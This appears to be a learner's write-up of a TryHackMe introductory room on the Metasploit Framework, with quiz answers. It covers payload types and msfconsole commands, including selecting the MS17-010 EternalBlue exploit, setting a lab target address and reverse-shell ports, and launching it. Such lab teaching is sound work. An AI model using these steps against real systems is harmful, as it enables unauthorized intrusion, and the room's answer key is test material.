THM: Metasploit: Introduction

Introduction to Metasploit

Metasploit is the most widely used exploitation framework. Metasploit is a powerful tool that can support all phases of a penetration testing engagement, from information gathering to post-exploitation.

Metasploit has two main versions:

Metasploit Pro: The commercial version that facilitates the automation and management of tasks. This version has a graphical user interface (GUI).
Metasploit Framework: The open-source version that works from the command line. This room will focus on this version, installed on the AttackBox and most commonly used penetration testing Linux distributions.

The Metasploit Framework is a set of tools that allow information gathering, scanning, exploitation, exploit development, post-exploitation, and more. While the primary usage of the Metasploit Framework focuses on the penetration testing domain, it is also useful for vulnerability research and exploit development.

The main components of the Metasploit Framework can be summarized as follows;

msfconsole: The main command-line interface.
Modules: supporting modules such as exploits, scanners, payloads, etc.
Tools: Stand-alone tools that will help vulnerability research, vulnerability assessment, or penetration testing. Some of these tools are msfvenom, pattern_create and pattern_offset. We will cover msfvenom within this module, but pattern_create and pattern_offset are tools useful in exploit development which is beyond the scope of this module.

Main Components of Metasploit

Before diving into modules, it would be helpful to clarify a few recurring concepts: vulnerability, exploit, and payload.

Exploit: A piece of code that uses a vulnerability present on the target system.
Vulnerability: A design, coding, or logic flaw affecting the target system. The exploitation of a vulnerability can result in disclosing confidential information or allowing the attacker to execute code on the target system.
Payload: An exploit will take advantage of a vulnerability. However, if we want the exploit to have the result we want (gaining access to the target system, read confidential information, etc.), we need to use a payload. Payloads are the code that will run on the target system.

Modules and categories under each one are listed below.

Auxiliary: Any supporting module, such as scanners, crawlers and fuzzers, can be found here.
Encoders: will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.
Evasion: ncoders will encode the payload, they should not be considered a direct attempt to evade antivirus software.
Exploits: neatly organized by target system.
NOPs: (No OPeration) do nothing, literally. They are represented in the Intel x86 CPU family with 0x90, following which the CPU will do nothing for one cycle. They are often used as a buffer to achieve consistent payload sizes.
Payloads: are codes that will run on the target system, four different directories under payloads: adapters, singles, stagers and stages.
Adapters: An adapter wraps single payloads to convert them into different formats. For example, a normal single payload can be wrapped inside a Powershell adapter, which will make a single powershell command that will execute the payload.
Singles: Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.
Stagers: Responsible for setting up a connection channel between Metasploit and the target system. Useful when working with staged payloads. “Staged payloads” will first upload a stager on the target system then download the rest of the payload (stage). This provides some advantages as the initial size of the payload will be relatively small compared to the full payload sent at once.
Stages: Downloaded by the stager. This will allow you to use larger sized payloads.

Metasploit has a subtle way to help you identify single (also called “inline”) payloads and staged payloads.

generic/shell_reverse_tcp
windows/x64/shell/reverse_tcp

Both are reverse Windows shells. The former is an inline (or single) payload, as indicated by the “_” between “shell” and “reverse”. While the latter is a staged payload, as indicated by the “/” between “shell” and “reverse”.

Post: Post modules will be useful on the final stage of the penetration testing process listed above, post-exploitation.

Answer the questions

What is the name of the code taking advantage of a flaw on the target system?

Answer: Exploit

What is the name of the code that runs on the target system to achieve the attacker's goal?

Answer: Payload

What are self-contained payloads called?

Answer: Singles

Is "windows/x64/pingback_reverse_tcp" among singles or staged payload?

Answer: Singles

Msfconsole

The console will be your main interface to the Metasploit Framework. You can launch it using the msfconsole command.

The Metasploit console (msfconsole) can be used just like a regular command-line shell. but only does not support output redirection. help > help.txt

ls: which lists the contents of the folder from which Metasploit was launched using the msfconsole command.
ping
clear: to clear the terminal screen
help [command]
history

Support tap completion for auto-complete the commands.

use : to change to the module you have decided to use.
show options: print options related to the exploit we have chosen.
set: to set the options (locally) for the chosen exploit (if you change the module it will reset)
show payloads: will list the payloads for the chosen exploit
back: will make you leave the current context you have choose.
info: will give you more information for any module after choose it, or with the module path to avoid choosing it.
search: This command will search the Metasploit Framework database for modules relevant to the given search parameter. You can conduct searches using CVE numbers, exploit names (eternalblue, heartbleed, etc.), or target system.

msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index, for example use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 >

The output of the search command provides an overview of each returned module. You may notice the “name” column already gives more information than just the module name.

You can see the type of module (auxiliary, exploit, etc.) and the category of the module (scanner, admin, windows, Unix, etc.).

You can use any module returned in a search result with the command use followed by the number at the beginning of the result line. (e.g. use 0 instead of use auxiliary/admin/smb/ms17_010_command)

Another essential piece of information returned is in the “rank” column. Exploits are rated based on their reliability. The table below provides their respective descriptions.

Ranking	Description
ExcellentRanking	The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances (WMF Escape()).
GreatRanking	The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check.
GoodRanking	The exploit has a default target and it is the “common case” for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). Exploit does not auto-detect the target.
NormalRanking	The exploit is otherwise reliable, but depends on a specific version that is not the “common case” for this type of software and can’t (or doesn’t) reliably autodetect.
AverageRanking	The exploit is generally unreliable or difficult to exploit, but has a success rate of 50% or more for common platforms.
LowRanking	The exploit is nearly impossible to exploit (under 50% success rate) for common platforms.
ManualRanking	The exploit is unstable or difficult to exploit and is basically a DoS (15% success rate or lower). This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/unix/webapp/php_eval).

https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html

You can direct the search function using keywords such as type and platform.

msf6 > search type:auxiliary telnet

Answer the questions

How would you search for a module related to Apache?

Answer: search apache

Who provided the auxiliary/scanner/ssh/ssh_login module?

msf > info auxiliary/scanner/ssh/ssh_login

Answer: todb

Working with modules

Once you have entered the context of a module using the use command followed by the module name, as seen earlier, you will need to set parameters. The most common parameters you will use are listed below. Remember, based on the module you use, additional or different parameters may need to be set. It is good practice to use the show options command to list the required parameters.

All parameters are set using the same command syntax:

set PARAMETER_NAME VALUE

As mentioned earlier, the show options command will list all available parameters.

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

we will set the RHOSTS parameter to the IP address of our target system using the set command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.165.39

Once you have set a parameter, you can use the show options command to check the value was set correctly.

RPORT: “Remote port”, the port on the target system the vulnerable application is running on.
PAYLOAD: The payload you will use with the exploit.
LHOST: “Localhost”, the attacking machine (your AttackBox or Kali Linux) IP address.
LPORT: “Local port”, the port you will use for the reverse shell to connect back to. This is a port on your attacking machine, and you can set it to any port not used by any other application.
SESSION: Each connection established to the target system using Metasploit will have a session ID. You will use this with post-exploitation modules that will connect to the target system using an existing connection.

You can override any set parameter using the set command again with a different value. You can also clear any parameter value using the `unset` command or clear all set parameters with the `unset all` command.

You can use the setg command to set values that will be used for all modules. The setg command is used like the set command. The difference is that if you use the set command to set a value using a module and you switch to another module, you will need to set the value again. The setg command allows you to set the value so it can be used by default across different modules. You can clear any value set with setg using unsetg.

The example below uses the following flow;

We use the ms17_010_eternalblue exploitable
We set the RHOSTS variable using the setg command instead of the set command
We use the back command to leave the exploit context
We use an auxiliary (this module is a scanner to discover MS17-010 vulnerabilities)
The show options command shows the RHOSTS parameter is already populated with the IP address of the target system.

msf6 > use exploit/windows/smb/ms17_010_eternalblue 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > setg rhosts 10.10.165.39
rhosts => 10.10.165.39
msf6 exploit(windows/smb/ms17_010_eternalblue) > back
msf6 > use auxiliary/scanner/smb/smb_ms17_010 
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                Required  Description
   ----         ---------------                                                --------  -----------
   CHECK_ARCH   true                                                           no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                           no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                          no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /opt/metasploit-framework-5101/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       10.10.165.39                                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT        445                                                            yes       The SMB service port (TCP)
   SMBDomain    .                                                              no        The Windows domain to use for authentication
   SMBPass                                                                     no        The password for the specified username
   SMBUser                                                                     no        The username to authenticate as
   THREADS      1                                                              yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_ms17_010) >

The `setg` command sets a global value that will be used until you exit Metasploit or clear it using the `unsetg` command.

Once all module parameters are set, you can launch the module using the exploit command. Metasploit also supports the run command, which is an alias created for the exploit command as the word exploit did not make sense when using modules that were not exploits (port scanners, vulnerability scanners, etc.).

The exploit command can be used without any parameters or using the “-z” parameter.
The exploit -z command will run the exploit and background the session as soon as it opens.

Some modules support the `check` option. This will check if the target system is vulnerable without exploiting it.

Once a vulnerability has been successfully exploited, a session will be created. This is the communication channel established between the target system and Metasploit.

You can use the background command to background the session prompt and go back to the msfconsole prompt.

Alternatively, CTRL+Z can be used to background sessions.

Session

The sessions command can be used from the msfconsole prompt or any context to see the existing sessions.

To interact with any session, you can use the sessions -i command followed by the desired session number.

Answer the questions

How would you set the LPORT value to 6666?

Answer: set LPORT 6666

How would you set the global value for RHOSTS to 10.10.19.23 ?

Answer: setg RHOSTS 10.10.19.23

What command would you use to clear a set payload?

Answer: unset PAYLOAD

What command do you use to proceed with the exploitation phase?

Answer: exploit